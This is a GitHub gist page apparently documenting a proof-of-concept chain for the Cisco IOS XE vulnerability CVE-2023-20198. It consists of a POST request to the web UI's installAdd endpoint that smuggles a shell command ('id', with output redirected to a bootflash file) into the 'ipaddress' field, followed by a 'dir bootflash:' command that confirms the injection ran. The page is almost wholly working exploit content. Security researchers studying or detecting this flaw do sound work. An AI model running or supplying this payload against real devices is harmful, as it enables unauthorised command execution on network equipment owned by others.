Danijel Grah rashimo
rashimo
/ gist:a0ef01bc02e5e9fdf46bc4f3b5193cbf
Last active
November 14, 2023 12:54
Chain of Cisco IOS XE CVE-2023-20198 commands
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## a POST request as: | |
| POST /webui/rest/softwareMgmt/installAdd HTTP/1.1 | |
| {"filePath": "abc/aaa", "fileSystem": "", "ipaddress": "1:1:1:;id>/bootflash/PaJbOLOT;#", "mode": "tftp", "operation_type": "SMU"} | |
| ## then another command with the POC technique: | |
| dir bootflash: | include PaJbOLOT |